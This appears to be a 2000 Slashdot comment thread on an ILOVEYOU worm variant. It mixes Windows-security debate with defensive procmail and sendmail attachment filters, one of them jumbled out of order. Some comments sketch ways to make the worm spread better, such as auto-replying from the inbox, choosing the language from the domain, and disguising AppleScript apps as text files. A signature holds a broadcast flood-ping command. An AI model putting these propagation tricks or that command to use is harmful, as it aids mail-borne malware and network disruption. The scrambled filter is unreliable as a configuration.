Slashdot Mirror
New, More Destructive Love Bug Variant
Everyone and their brother wrote in to say that a new and more destructive version of the ILOVEYOU virus has hit the net. Instead of deleting on a few files, this one deletes every file not in use. And even more amusing, rather then using a hardcoded subject line, it uses the host's email archive to cause the subject to change while it propogates. Intelligent mail client users continue
to be unaffected (although the ILOVEYOU sympathy virus has been annoying the heck out of us for days now... it works on the honor system: Please delete some files and mail to all your friends).
This is a security hole that Microsoft knew about, so why the bug icon. It's a design flaw. Most people who read Slashdot, use the little icons to gague what stories they wish to read. I may be completely wrong, but this should have the Mircosoft icon, or maybe an MS Outlook icon if Slashdot has one.
Well that was the cheapest two cents on the block.
-- James Dornan AKA TigerSmile
-- Prepared at the direction of, or to be sent to Legal Counsel, in anticipation of litigation. Attorney Client Pri
alright...then my PDA is better than linux because it doesn't suffer harddrive crashes.(I don't think a closed-minded person like you will ever see my point).
I work with ISS frequently and view them to be a very professional and ethical firm.
I did not mean to imply that ISS did anything. I did not mean to finger anyone specifically. I do believe that anti-virus companies have released viriuses for more revenue.
I do agree with the kiddies having written the ILOVEYOU and it variants.
If at first you don't succeed, skydiving is not for you.
E-mail administrators?! HAH!! The guy that admins our Exchange box was a Customer Service call guy up until 2 months ago, they just sort of dumped it on him and he had to learn how to use it in 2 days. He's still figuring stuff out, I help him when I can, but until this happened neither of us had worked with an Exchange Server before. Our company is too cheap to hire someone that knows what they are doing, so we end up scurrying around for days trying to solve problems that would take an experienced person 15 minutes....
Ain't work grand?
Kintanon
Check out JoshJitsu.info for Brazilian Ji
Which is why irrespective of malicious damage it is always a good idea to back up the home directory. There are other nondirected ways to lose that very important document. Such as for example catastrophic hardwared failure, or even simple accidental deletion by the user.
Back up is not something that should really be neglected..
I've never seen Outlook for the Macintosh, but Outlook Express for MacOS is indeed pervasively AppleScriptable. Not only that, but if you receive a Macintosh executable as an attachment in Outlook Express, its presence is indicated by a blank document icon (rather the diamond that traditionally indicates an executable file type in MacOS), and the default behavior of Outlook Express on double-clicking the icon is to execute it. So it would be quite easy to make a compiled-as-application AppleScript named something innocuous like 'pricelist.txt'. Most users would probably just double-click the icon, expecting the attached 'text file' to open in SimpleText, and then, well, you get the point. In theory, of course...
This will work for files that are saved to disk, but outlook will still run the .vbs file.
Mark
This sort of thing can be considered a sort of direct action.
Execpt, of course, that it's totally indiscriminate; it affects ordinary home users as well as corporations (and, of course it affects the corporate user's personal files too).
I guess that there are innocent bystanders injured in any "war", but you're supposed to try not to hit them...
Cheers,
Tim
It's official. Most of you are morons.
I just noticed that in the filters I posted that my tab character has been represented as a '>', so if you actually implement these rules, you will want to make that change as well.
You got it... =8-0
> I would imagine if it ever went this high, the email server(s) would just not handle the load.. Or, was it shut down to merely stop people from losing data
Both. The mail system was getting pretty bogged down, and then the sysadmins shut the entire system down in order to be able to clean things up.
The funny part was that they must have put up thousands of hadcopy signs all over the place that morning, warning people NOT to open up email attachments (they even put them up in individual stalls in the bathrooms!), but the worm still spread like wildfire.
Some time later, I sent an email to one of the VP's whos office regularly sent out coprorate "communications" in the form of MS Word email attachments, suggesting that perhaps he should set the example of using other, more secure forms of communication. I took a lot of heat for that suggestion, but I still think my point was valid. The company literally loses hundreds of thousands of dollars every time one of these viruses hit, and it's all because the leaders foster a culture of dependence on Microsoft "integration" and careless trust of complex tools.
(**sigh**)
-- Your Servant,
Your Servant, B. Baggins
pine would be nice if it had a graphical client as well. zmail did well in that aspect (although i never used it but ppl who did liked it)
-Jae
Do you think anyone that writes really destructive viruses and gets caught is ever hired on at anti-virus software development companies?
You always hear about old school hackers that take someone down, then get a job heading up their seciruty department because they were so impressed with the hackers work. Just wondering if this works in other arenas...
Long signatures suck.
What the virus should do is, do nothing destructive to the machine, instead give the user a message listing all of the bad things that could have happened because they use Microsoft products, and propagate itself.
If writers stopped creating virii...
Please see Tom Christiansen's Article on the plural of virus
If I have to put up with "an email", then the rest of you have to put up with "virii".
Later,
Blake.
you could try using the task scheduler and batch files
.oO0Oo.
you could even write a VB exe to take care of it
There are places where the networks are not touching,and there are places where they are-Boeing's Lori Gunter
Hey, that's some proactive sysadmin there!
"I will take the Ring," he said, "though I do not know the way."
How many owned boxes MS have?
- Propogate itself
- Dissolve the relationship between script files and the WSH
- Uninstall the Windows Scripting Host
- Delete itself
I imagine that it can be done. If not totally through the WSH, then the beginning can be, and then the rest through a loaded C or VB module. Of course, you'd still get into a heap of trouble if you did that, though you would be protecting people...No need. Once someone sends you one you have the code (it's a VBScript text file...not a compiled program). Of course, if you have Outloook (I heard it's quite popular ;) )you'll want to be sure to Save AS the attachment and not open it directly (not that you didn't know this, but other people may be reading this).
Of course, one could just go over to Microsoft and read the VBScript documentation to create their own Herbie the Love Bug.
-- @rjamestaylor on Ello
could someone please alter this virus so that its payload turns off the registry setting that allows it to propagate, and end this mess once and for all? a self-vaccinating virus, what a concept. then we can safely ignore this problem (for a while).
I think you mean no virus should be able to write to its own executable image. That would only prevent some wierd twisted self-modifying (but possible) virii. The virus could just write a new file and copy itself byte by byte then exec the new virus.
In any case, the computer wouldn't work at all if processes were denied read access to its executable image: no process would ever be able to read its text segment (program instructions)! This would be quite a problem for every program. ;)
As for some of the up and coming AV firms, I wouldn't put it past them, however in this case I think it's just kiddies having fun with a mechanism that someone else wrote, doing it just for grins and bragging rights.
More race stuff in one place,
than any one place on the net.
. . . check out this file, on the Samhain project. This is basically a polymorphic-stealth worm system, that was developed as a proof-of-concept (and was never finished).
It's cross-platform (as in, Unix and NON-Unix), it goes really far to evade detection and analysis (not to mention removal), and the freakiest part of it is, the whole system was designed to work in a distributed, intercommunicable fashion ("wormnet"). It's scary shit. Especially an observation the lead programmer makes near the end-- "sure, we didn't release this, but what if some other intelligent but deranged programmer out there has?"
iSKUNK!
Viruses are challenging and interesting. Some of the ideas used in them have been incorporated into modern software. Just like anything else if you don't use viruses to harm people or data their is nothing wrong with them at all. Why do linux hackers write code that they will give away. They like the challange.
I always thought that it would be cool to write a virus killer virus. It would search out a few known viruses and destroy them.
Environmentalists are their own worst enemy. ~tricklenews.com
This might cause problems when trying to run .vbs files from some other program, but I would imagine most people would not need to do this. It would be better if there was a way to get Outlook to use a different command (such as Edit) as the default action, but I'm not sure if this is possible.
--Bob
1^2=1; (-1)^2=1; 1^2=(-1)^2; 1=-1; 1=0.
Hmmm....on my box, where I did the above, it opens the editor, just like it should.
It is my impression that Outlook "opens" the file by running the default action on it. If you set the default action to "Edit with notepad", you should be safe.
At least, it works that way on my Win2000 box, running Outlook.
The cake is a pie
I was thinking something like
the "hillarystwatwarts" virus,
but even more subtle. Something that
would get repeated for a few hours or days
before people realized what they were saying.
It would probably have to be something like,
i dunno, remember the "dole means penis in iranian" rumor?
-fb Everything not expressly forbidden is now mandatory.
I thought it was people like Kevin Spacey who gave a bad name to showers...
Later,
Blake.
There already is one - see : PrettyPark and ExploreZip
Hey, why we're limiting ourselves to command-line email, why bother with a client at all...
:)
Telnet to the relevant port on the mail server and send/read there.
Hey, watch it. You're posting copyrighted code in its entirety. Next thing we know, some Phillipine (sp?) dude is going to write a letter to Andover saying that Slashdot is posting copyrighted code, and to remove it immediately!!
Two things we are doing to fight this nonsense:
1. When our tech support talks to our users, we have been advising and walking them through uninstalling WSH and/or removing associations to vbs, hta, shs, etc.
2. We installed a procmail filter to "trap" all the vbs scripts and the known exe virii sent in the email that go through us. It also goes through and "Defang's" the html code in any html email.
Since we implemented this filter, we have trapped thousands of poisoned files, which means that our users did not get infected with them, or spread them.
The place to get your copy of the procmail filter? http://www.wolfenet.com/~jhardin/procmail-securit
Microsoft Security is the ultimate oxymoron.
My 1.5 cents
********
********
Windows has detected several mouse-clicks, restart for the changes to take effect.
Better to be hit by a weak one, churn out the antibodies, and be better prepared for the nasty one.
Long signatures suck.
The main "problem" with iloveyou was that it is too easy to identify. Everybody who turned on his TV or radio knew that he should not open mails with the 'i love you' subject. This new variant is already much better, taking the subjects from the INBOX is a good idea, but putting the "FW:" in front of every subject makes it quite easy to detect. Just imagine a virus that
- answers mails in the inbox automatically, put "Re:" in front of the subject, quotes the whole message and writes a few sentences, perhaps using an algorithm similar to "the doctor" in emacs. I think using the INBOX is a key point, as inexperienced users often dont use the addressbook, even though they are the most vulnerable.
- has some less obvious subjects for those recipients in the address book that arent in the INBOX. Perhaps subjects like "next friday" or "hi.." would be more appropriate.
- analyses the mail clients of users in the inbox to send the right variant to everybody. Perhaps there are similar vulnerabilities on Macs?
- analyses the nationality/language of the user by analysing the domain name
If someone did this one month ago (before people knew of iloveyou) this could have been the end of most windows installations."There is no good or evil, there is only fun and boring." - The "Bad" guy in Hackers.
Later,
Blake.
The fact is, as far as the average person is concerned, this is a security problem with email and the internet in general. They don't know what a vbs attachment is, and they certainly don't know that it is a brain-dead-obvious problem with M$ products and nothing else on this planet. They don't know this because nobody is telling them. I've read dozens of articles in the mainstream (esp. the lowbrow, tabloid type) press lately and this fact is never mentioned.
7 /1411239&threshold=0&commentsort=0&mode= thread&cid=237">this post</a>, dealing with the congressional hearings last week on the 'Love Bug'. Especially disturbing is the exchange between the congresswoman, who clearly understands that it is a M$-specific problem, and the so-called 'technology expert' who is doing his best to obfuscate the point.
Call me paranoid, but it reminds me of the old "red scare" tactics, and I'm worried that an effort is being made to prepare the populace for some new, highly restrictive and repressive laws dealing with software and the internet. And lets face it, software and the internet is one of the few areas in our society in which freedom has been increasing of late. Keeping the public ignorant of the real situation will be critical to the success of any effort to reverse this trend.
If you have doubts about this, take a look at <a href="http://slashdot.org/comments.pl?sid=00/05/1
I don't understand why the justice department, supposedly scouring the earth looking for evidence of harm done to consumers due to M$'s monopoly position, is not picking up this one. Surely this is a smoking gun, with fingerprints, and a pile of dead bodies for their case. The only plausible explanation is that there is a larger strategic imperative at work, in which the power of the general populace is deemed more pernicious than that of monopolistic corporations.
This discussion needs to spread beyond the confines of technology forums such as this, and into the mainstream consciousness, before it's too late.
It's probably too late for people to read this, but from now on, I have started signing ALL emails with attachments, so people know I'm not sending a virus. Hopefully more people will do the same, since VBScripts can't read your mind and figure out your passphrase.
--
The other side is crowded. The dead have nowhere to go.
take a triptonica to subthunk
I've never heard about it. Did I miss a story?
Virus Experts are predicting that the spread of this variant will be slower than the original Lovebug virus, because of the 'mutation' that it tries to perform on itself.
This may mean it can spread further. The more time it takes the less hysteria will surround it's spread.
Every time it mutates, it adds up to 10 lines of crap to itself, in order to try to avoid detection. It ends up being huge after a moderate number of iterations.
No doubt someone is working on version 2 which will use more sophisticated algorithms for mutating.
Any IT admins (and of course, end users) who don't rely on microsoft products should be joyous right about now -- they are immune.
During a workterm I had a couple years ago, they were migrating everything to Microsoft.
Including outlook.
Poor poor sysadmins. =)
Ok, then change it to look like this:
:0 Bf2 /i;}' -e '/Content-Type:/{N; s/name=\(.*\)\.vbs\(.*\)/name=\1.vbs.txt\2/i;}' | /usr/local/bin/formail -i "X-Loop: VBS viruscheck"
:0 Bfi ;}' -e '/Content-Type:/{N; s/name=\(.*\)\.js\(.*\)/name=\1.js.txt\2/i;}' | /usr/local/bin/formail -i "X-Loop: JS viruscheck"
:0:
*!^X-Loop: VBS viruscheck
*^Content-Disposition:[> ]+.*[Aa]ttachment.*\.[Vv][Bb][Ss].*
|/usr/local/bin/sed -e '/Content-Disposition:/{N; s/filename=\(.*\)\.vbs\(.*\)/filename=\1.vbs.txt\
*!^X-Loop: JS viruscheck
*^Content-Disposition:[> ]+.*[Aa]ttachment.*\.[Jj][Ss].*
|/usr/local/bin/sed -e '/Content-Disposition:/{N; s/filename=\(.*\)\.js\(.*\)/filename=\1.js.txt\2/
$ORGMAIL
"Intelligent mail client users continue to be unaffected" - is that users of intelligent mail clients (aka not LookOut) or intelligent users of mail clients (aka those who don't open attachments anyway)...
;)
Just wondering
miLady
This is not a signature.
Someone in our company got this one this morning.
Luckily she had the good sense to call me because of the 20 or so e-mails sent around about NOT OPENING attachements. So I talked her into deleting it without opening it. YAY! Hopefully none of the higher ups will get one, they are dumb enough to open it without thinking about it...
Sigh...
Kintanon
Check out JoshJitsu.info for Brazilian Ji
I use a NT network in my job and I get a lot of e-mail. I didn't receive a single I LOVE YOU message, probably the sysadmins (about 200 km from where I am) are doing the same as you are.
:-(
Even so, Windows users are at disadvantage, for it leaves a bitter taste in or mounth like nobody loves us...
- A.P. (seriously, folks, WHAT ELSE is VBscript for?!)
--
"One World, one Web, one Program" - Microsoft promotional ad
"Remember when the U.S. had a drug problem, and then we declared a War On Drugs, and now you can't buy drugs anymore?"
I'm in a fortunate position to be sysadming a group of win users basically with the authority of our PHB in matters related to computer security (=I don't have to waste time arguing about my decisions with employees). PHB only wants me to report changes in the policy to him.
Rule 1: No Outlook allowed.
Rule 2: VBS disabled by default.
Rule 3: Never, ever run anything from an attachment. If you do, and our system gets screwed, there's hell to pay (up to getting fired/summary execution).
Rules 4-: (standard security things like passwords etc.)
I think the rule number three has been most effective. After you get employees convinced that they can actually get fired for running an attachment, things get much simpler. I know it's a "reign of fear" but that's what you get for running MS-crap.
Why don't we start taking the usefullness of a virus back?
What I mean is, why doesn't someone write a virus that does good? It could auto-run and disable all of the cheesy security holes that MS hasn't fixed yet. It could spread like a worm, and just go on a rampage fixing problems.
Why must virii always be bad?
I have YET to recieve ANY of the 'vbs' email worms in any email i've ever recieved
Hehe, subscribe to linux-kernel, I laughed my ass off when I got this email.
There followed two or three automated virus warnings no human bothered to answer. Pretty ironic it was.
Like "Tuxissa"? (from segfault)
-----------
-----------
100% pure freak
I'm surprised noone has mentioned this wonderful procmail setup/script that has been around for some time to protect against HTML or file attachments in email.
i ty.html
I've been using it for some time and it has protected myself and my users against almost any macro viruses I have heard about.
http://www.wolfenet.com/~jhardin/procmail-secur
Integlligence and talent are not a measure of mental stability. People who write destructive code obviously have some problem with responsibility.
I don't believe that such acts are always intended to be some attempt to edcuate the technically unawares amongst us.
Its a crime, not a practical joke; and not always committed by the spotty teenagers the press would have us believe.
You can lead milk to a rolling horse, but too many cooks break glass houses.
Does any mailing system applies 'quotas' to its users ? E.G. no more than 1000 e-mail per day, no more than 1 e-mail every ten seconds?
Ciao
----
FB
Funny yes, but people seem to be missing the fundamental reason why this happened.
It has nothing to do with MS letting people run attachments without saving them first.
This is all about mapping extensions to applications.
This is a broken idea - totally. For starters it is quite simply dangerous, as the mappings happen everywhere. And installing an application might setup random mappings. But add onto that the fact that its used to associate scripts with their executor, much like the shebang line, only worse - the file needs no execute privileges. If you like, every mapped file extension automatically sets execute privileges. It is this functionality that is broken - not the mail client. And this has been in existance since DOS days, IIRC. So removing or fixing this "feature" is next to impossible.
Good luck MS fans - it's a rocky road ahead.
Matt. Want XML + Apache + Stylesheets? Get AxKit.
This will protect local delivery, so user's POP'ing in or whatever will be OK. But what I would like to see is a good sendmail rule to put on the mail gateway for stopping this. I've gathered that the Content-Disposition header is key to stopping it, but I'm not sure sendmail will recognize it as a header to look at (havent put my test in place yet). I'd like to kill it before my gateway sends it on to the Exchange side of the house...
At the GeekPride Festival, several of the Linux boxen were rooted. Some friendly chap installed FreeBSD instead. I thought that was cute, although a bit annoying.
--
The other side is crowded. The dead have nowhere to go.
The best solution would be for all "executable" attachments to be treated as untrusted code with a sandbox like a Java Virtual Machine - considering Microsoft's "expertise" in "enhancing" Java this should not be to difficult a solution to implement.
Port Outlook (and the brain-dead fondness for executing anything executable) to *nix and you'd still have as much of a problem.
Sure, Win'9* security is broken, but it's not bad security that's the problem here. I want Outlook to do anything I personally have the rights to do. I want Outlook to have a scripting language, and to offer mail services to other scripting languages (this is useful). The only thing I don't want Outlook to keep doing is executing code from anywhere that I haven't told it absolutely explicitly to do so. I don't want signing - what am I going to do ? Sue them ? I can't even email my lawyers, as they've just eaten my address book.
Win2K has brought its security concepts into the '80s, with Kerberpoodle the 2-headed mutt. We'll see how solid the implementation is, but at least they're making an effort.
Am i the only one who misses the old school viruses like Empire Monkey.B?
---
-
ping -f 255.255.255.255 # if only
---
This sig has been temporarily disconnected or is no longer in service
You do not really think that a real virus writer would answer to you? That would be very unprofessional of him/her and dangerous too.
You can't handle the truth.
No, sadly that would violate the DMCA...
(Or should that be "Virus Building System"?)
Information wants to be free -- but informants want to be paid.
I'm proud to say I once almost got kicked out of Microsoft for sending something like this to a relatively large e-mail alias. (I know, I shoulda tried harder.) The one I sent was actually embellished slightly be a friend:
And whatever you do, don't try to remove this virus from your system. If you do, it will immediately mail the IRS and tell them you had $2,500,000 in unreported income last year. From dealing drugs.
--
Someone you trust is one of us.
Linux is less susceptible to viruses, thanks to its multiuser-structured security system. It's MUCH HARDER to write a linux virus than a windoze one. And even then most linux viruses can do little more than delete your home directory, not take the whole system down irreversibly, unless you're stupid enough to deliberately run them as root.
I disagree. Just because it's not socially acceptable or ethical by your standards doesn't make it not art. Art is subjective, and defined by the enjoyment of its creator, and its appreciators.
...) And as long as there are people out there who appreciate the effects of his art, (here I'm referring to many non-Windows users who recently got a great deal of entertainment) or the code that drives its behavior (in this case the actual code), it *is* art.
As long as the creator derives enjoyment from his creation, it is indeed, art for him. (and yes, that would make baking cakes art
Incidentally: murder has been considered art before. So has crime. Many people refer to committing certain crimes well as an artform.
I mean, if we go by your definition, then IMHO, modern art is not only NOT ART, but I should probably sue those artists for producing such drivel, and causing me mental trauma!
Notice, however, that I do not. Just because I don't enjoy it, and just because I kill off 5 brain cells every time I look at one of those exhibits, doesn't mean it's not art!
I agree that unix is more secure but it does not seem to be set up to deal with hostile processes. Suppose that you are running X. Then it (any hostile process) can read off all your keystrokes and so find passwords PGP encoding etc. It can also edit *your* startup scripts (eg .cshrc) to make sure that it gets run whenever you login. This may take a time but if it doesn't do anything nasty until it has gathered its information and spread then that does not matter, in fact it may be an advantage as there is less panic about it. Of course this all assumes that someone chose to execute the hostile script....
<Script Language=JavaScript>
document.write("Best viewed with ");
if (navigator.appName == "Netscape") { } else { }
</Script>
Even works for Opera
Using HTML in email is like putting sound effects on your phone calls. Just say <strong>no</strong>.
First I want to start off with a comment on the First Post message. Anyone who posts those stupid "first post" messages needs to get a life. It is very lame to see 5 messages (let alone 1) that all have something to do with being the First Post. Ok, on to what I was going to talk about. Anyone who thinks that only people that use MS Outlook will get infected with this (and other) virus [trojan, or whatever you want to call it] needs to realize that ANY MS Windows based email client that allows the user to either open an attachment directly, or save the attachment so the user can run it, are able to get infected with these types of virus's. MS Outlook is only needed to spread itself the people in the infected persons Outlook address book.
I am using Win98, Outlook2000, and the preview pane. Yes the virus showed up in my inbox. Because I have more than one braincell, I immediately recognized the .VBS file as a virus and deleted the e-mail. Case closed. Is linux better because if you were to open the attachment it wouldn't work? That's like saying that the windows platform is better because a virus targeted for Unix systems will not affect it. I thought the whole point of Linux was the functionality. You can make it do anything you want. It sounds to me like the people screaming MS sucks over this feel we need an AOL style OS (OS for dummies) to keep dumb users from executing viral code. It comes down to user education. If you aren't sure what it is, don't open it. Simple.
I work for a ISP our customer service inbox is full of these. We call them back tell them what is wrong and help them scrub. Most likely you just know smart people.
Cypherpunks: Civil Liberty Through Complex Mathematics. Those who live by the sword die by the arrow.
We're just going to have to agree to disagree on this one. As a programmer, I find nothing 'humorous' about destructive viruses. The fact that people with programming skills (which only a small percentage of people actually have) use them to write programs that purposely hurt other people (no, not companies, but the people who work at them) makes me really angry. To put it nicely. If these individuals would use their obvious skills to write useful code, maybe we could program Microsoft into non-existence. :) As far as I'm concerned, virus writers are parasites, and like the big tick I picked up once a few years ago while hiking in the woods, we simply can not get rid of them quickly enough. I hope you don't consider my reaction too extreme and simply discount it as raving. I know many programmers and not a single one of them has any sympathy whatsoever for virus writers. Yes, most people do need to become more technologically savvy, no question, but do they have to have their hard work and personal files destroyed to get them to do so? For me, that's an unequivocal NO. There is a big difference between slapping a child's hand to keep it away from the stove and shoving the kid's hand onto the burner. 'Nuff said.
Yes, I could write a bash script or perl script that deletes files. Guess what, not everyone uses bash and has perl on their unix system, and if they did, it would only delete their user files, and NO system files would be affected. Unix was build off of a concept of security. With Windows, security was an afterthought, and not a very complete one.
Besides, unix users (as a whole) tend to be a little more tech-savvy and know not to run things like that.
As CmdrTaco said, intelligent e-mail users continue to be uneffected.
Finkployd
I can't claim that I'm perfect, I try to help my high-school be immune from these things, but my dad opened the ILOVEYOU e-mail at work... and he works for the Coast Guard computer systems.
What needs to be done:
- Change the defaults for Outlook, etc. so that worms like the ILOVEYOU worm and its rip-offs cannot be automatically run.
- EDUCATE! The mindless windows user tries to make things as simple as possible, so they set themselves up for attack
I can sympathize with both sides, I used to use Windows at home, and was once one of the people who would have opened a letter like that, now I have a Mac and a Linux machine, and have changed the defaults on the family's windows machines so that no matter what my parents do, they can't be hit.Education needs to come about, and Microsoft isn't going to educate anybody, unless they make the bouncing paperclip start telling people about computer security, although I'm not sure that we would want people to hear Microsoft's version of computer security.
My two cents,
Gawyn
Freedom of Speech?
I wish I was joking.
Richard
Please, a nice distinction needs to be kept in mind between those who are not focused on computer technology, and those who actually are "stupid". I would not deny that stupid folk exist, but it does one no good to call someone stupid just because their area of interest is not the same as ones own.
E.g., I do not find accounting of interest, but this does not cause me to consider myself stupid, even though it sometimes causes me hardship. (Of course I could just quit that book club, but I don't like that choice either.)
I think we've pushed this "anyone can grow up to be president" thing too far.
I am glad, I didn't see python there. :-)
------ Curiosity killed the cat. {satisfaction brought it back | it didn't die ignorant | lack of it is killing mankind
It's harder to write a script that will run in Linux than it is to write a VB script. IT's like martial arts...the discipline teaches you not to do harmful things, maybe.
Ceterum censeo Microsoftam esse delendam.
It's been done. See http://www.finjan.com and download your free copy of SurfinGuard. It's for 95/98/NT but it seems to do the job. They've got some non-destructive demos on their web pages you can download to make sure that SurfinGuard is working.
But I always thought a worm had to be self-mobile, too -- that is, the LOVEBUG needs human intervention to become active on a system, while (in my mind) a worm would simply connect directly to that machine and immediately begin executing.
The Morris Worm worked that way -- once released, it had a life of its own without any need for anyone to click on an attachment. If you consider a replaced .jpg file or a faked attachment to be executables (they are, just with no other functionality), then this is really much closer to the classic "virus" def.
david.
Nearly right,
the next variant will contain a variant on the words "Trade Secret" for title, A html based Javascript click through licencse for a body (starting and ending with a load of legal mumbo jumbo and containing perhaps one sentence of warning as to what is about to happen), and a debian install starting with delete all partitions.
BTW, the only target will be M$
Never underestimate the dark side of the Source
I am personally extremely tired of having to panic for the latest virus and scrambling to McAfee.com every time some script-kiddie makes something that he thinks is 31337, so that everyone can ph33r his skills.
Question is, does anyone know what the names of some of these profile scanners are? I had an email a while back with the info, but it seems to have gone the way of the dodo.
"See, we plan ahead! That way, we never have to do anything now."
Blocking attachments seems like a "throwing the baby out with the bathwater" kind of solution.
---
This sig has been temporarily disconnected or is no longer in service
So let us start terming the bug as a Windows bug or Windows virus instead of a generic computer bug. This goes a long way in getting the mindset of people that if you want to be on the Internet use a secure OS - Mac, Beos or Linux pick your choice.
I partially agree with you in that this is a Windows-specific virus. I disagree, however, with your comment indicating that the cause is lacking the security of Linux. The real issue is the availability of VBScript on the client, which in turn gives the attackers access to the local file system.
Our company runs both Windows and Linux 7x24 (with a few reboots here and there on the Windows boxes every day, of course ::wink::). We've received the ILOVEYOU attachments and just laughed at them because our e-mail clients don't support unrestricted scripting, even on the Windows machines, where we run Netscape Messenger. Netscape Messenger, while it allows JavaScript, doesn't allow unrestricted access to the file system and other Communicator resources like VBScript does.
We perceive unrestricted scripting access from the e-mail client as the real problem, not Windows itself. Any system that allows unrestricted scripting privileges (even *NIX systems) to its users is vulnerable to malice.
As for Macintosh and BeOS being "secure", I just beg to disagree. Perhaps you know something about them that I don't about them. Would you care to expand on exactly what makes them inherently secure when compared to Windows?
In conclusion: Our recommendation to our customers is very simple: Get off MS-Outlook/MS-Exchange for e-mail. IMAP and an appropriate e-mail client will do the same job without having to worry about VBScript viruses.
Talk to you later,
Eugenehttp://eugeneciurana.com | http://ciurana.eu
You suggest that the more coding a person learns, the more disciplined they get. This is kind of like the martial arts model, where you learn discipline that keeps you from using your powers for evil. But coding is easier to learns, what with script kiddies and tools like VBS. People who are too dumb to think about the consequences of their actions can write devastating things. I'm glad that hacking can be more egalitarian, but...
Ceterum censeo Microsoftam esse delendam.
You should be able to place a filter like this on a sendmail gateway host by using sendmail's mailertable feature in your .mc file, and then saying:
e r
host.com procmail:/etc/procmailrcs/host.com
in the mailertable file, and set the host.com file to something like:
(rules for checking spam, viruses, evil attatchments, etc.)
:0
! -oi -f $forward_message_on_properly_to_internal_mailserv
Though I don't have any pressing need to throw the above together and document what I did. Ideally, you would want to combine the above method with one of the several anti-evil-stuff procmail filters on freshmeat.net...
I work for a medium sized company, I didn't recieve a single virus on my corporate email account.
However I did recieve an ILOVEYOU on the first day that I knew it was out... Someone at the company I buy computer parts from recieved one and executed it, that instance was fairly controlled, however it got to the head of wholesales, and he also executed it. I was on his email list, lucky me.
We recieved a few at the company, it didn't get spread because no one here ran it because we (the IS dept) have made them to scared of viruses over the years.
Devil Ducky
Devil Ducky
MY peers would get out of jury duty.
That's true, and it that could happen on ANY OS I know of (well, OS/390 being an exception), so I guess it really boils down to the user and how well educated he/she is about such matters. Unfortunatly (I believe) Windows attempts to dumb down users while Linux has the opposite effect. I also don't buy that Windows is more productive, it all comes down (again) to the user and what they learn. Windows IS however, less secure.
Finkployd
Imagine all the fun they'd have reporting that? MSNBC news: The MSNBC virus is wreaking havoc on the world's computers! We didn't do it, honest! *grin*
-subtraho
The real problem here with these kinds of things isn't just Outlook. Or just moronic users.
The whole security system in Win9x is flawed. Windows9x was never intended to be on a network. Win98 is just a rehashed version of Win95, wich is just a rehashed Win 3.1. Single user OS's that had "root" access everywhere were fine in the early and mid '90s. That's not the case anymore. Now that everyone is hooked up to the itnernet, and other people have access to these single-user OS's such as Win9x. it's didn't matter that you had "root" back in the day, you were the only one using the system. Now many people can run code on you computer. Be it a vbs, java, etc.
A *nix variant doesn't have this problem. Unix was deigned with networks and network security in mind for over 30+ years. I couldn't if I tried to screw up my system like these vbs files do to Windows computers.
Even Win2k security is lax. For instance, how many times does a typical linux install(be it Redhat, Debian, or anything else) go "DON'T USE ROOT AS A USER!" and foces you to make a regular user account? Now look at Win2k's installation, that gives you your user name with admin. privs.
If Microsoft really wants to stop stuff like this, they need update their entire network security model to the 21st century....or at least the 1970's. Windows9x was not designed to be on a network. That's the reason it has no security. "access zones" and what have you in programs like Outlook are just a cheap hack to hide the real problem of the Windows security model. The problem being, it wasn't designed to have one.
Wouldn't a .txt file have a different icon than a .vbs file? Although, still, it's rather confusing to people to think that stuff is hidden when they think they can see it(I saw ".txt". not ".vbs".) Maybe someone should put out a "virus" to change the default icon for .vbs files to a skull and crossbones? That would be harder for people to instinctively open. (AAAGH!! Poison!!! Delete delete delete!!!)
Withdrawal before climax is very ineffective and those who try this are usually called "parents."
I was thinking of a hypothetical virus in the shower this morning.
Geez! People like you is what gives a bad name to showers.
__
__
Men with no respect for life must never be allowed to control the ultimate instruments of death.
GW Bu
So, let us go for a little thought experiment here: Suppose somebody finds out that some files should be deleted reguralily. Personally, I would find that useful. Some large files, such as Postscript files (most of my large PS files are generated from raw (La)TeX files anyway), core-dumps, etc. should be deleted when they are n days old. Useful stuff. OK, so, let us postulate that there exists somebody who could write this in VBScript and make it work. Great. Well, this guy forwards it to somebody else who thinks it is useful, and who has a small disk and thinks that n=1, in other words certain files should be deleted every day.
Now, at the other end of the world sits a geek who has not yet realized it, but given some fortunate circumstances (e.g. education) could become a hacker. This guy has written a script to send his friends pieces of VBScript code that he writes and install it on his friend's computers. I mean, that would be nice and unselfish.
Now, the next thing that happens, is that these two programs meet, and merge.... Given that not everybody involved are particularily clued, it might well become a worm...
So what's the point of all this? Well, in an unfortunate case, some well-meaning, but not very competent programmers may create a worm like the ones we have just seen by accident, and the moral is, the more stupid your users are, the more you need to make sure they don't hurt themselves and the others.
M$ is more like "so, you would like to shoot yourself in the foot? Really bad? Sure, for only $29.95, we will give you a gun, and point it at your foot for you, the only thing you would have to do yourself, is pull the trigger. Don't worry, we'll show you where it is."
Employee of Inrupt, Project Release Manager and Community Manager for Solid
I haven't tried this but it was posted on comp.mail.sendmail after the original Love Bug. I'd actually like to try it, but I know so little about sendmail that I'm unsure as to how to apply it - anyone enlighten me?
# TURN ON CONTENT-TYPE MATCHES: uncomment lines as instructed.
Kquotetoplus dequote -s+
HContent-Type: $>CheckContent
## By Mike Schwager. http://www.enteract.com/~schwager
## http://www.schwager.com schwager@enteract.com
## INSTRUCTIONS:
## Uncomment 1 (or more) of the following ChkPat lines. Add new ChkPat
## lines if necessary, as given in the examples. Change the MIME-type
## (eg, from application / octet-stream to application / ms-word )
## if you need to, and change the name and/or file extension.
## For each pattern line, there should be a matching rule under SCheckContent.
## Do not include double quotes in the pattern line! They will be replaced
## with plus ("+") signs.
## Uncomment the SCheckContent line.
## Uncomment the appropriate rule(s).
## Change the rule(s) to use the message that you want.
## Change the message(s) as appropriate. Add new messages as appropriate.
## Watch your tabs!
D{ChkPrfx}application / octet-stream ; name=
# Here are your patterns
D{ChkPat1}.vbs
#D{ChkPat2}.exe
#D{ChkPat3}wordvirus.doc
# Here are your messages
D{ChkMsg1}REJECT- This message may contain a virus in the attached script.
D{ChkMsg2}REJECT- This message has a virus. -MS
SCheckContent
R$*name=$* $: $1 name= . $2
R$* $: $(quotetoplus $1 $)
R${ChkPrfx} $* $: $1
# Using these lines as a guide, match patterns; include messages
# only the character in front of "$#" should be a tab. Don't forget the tab!!
R $* ${ChkPat1} $* $# error $@ 5.7.1 $: 553 ${ChkMsg1}
#R $* ${ChkPat2} $* $# error $@ 5.7.1 $: 553 ${ChkMsg2}
#R $* ${ChkPat3} $* $# error $@ 5.7.1 $: 553 ${ChkMsg1}
## END CONTENT-TYPE
Macintrash files have, in fact, two invisible 4-character extensions.
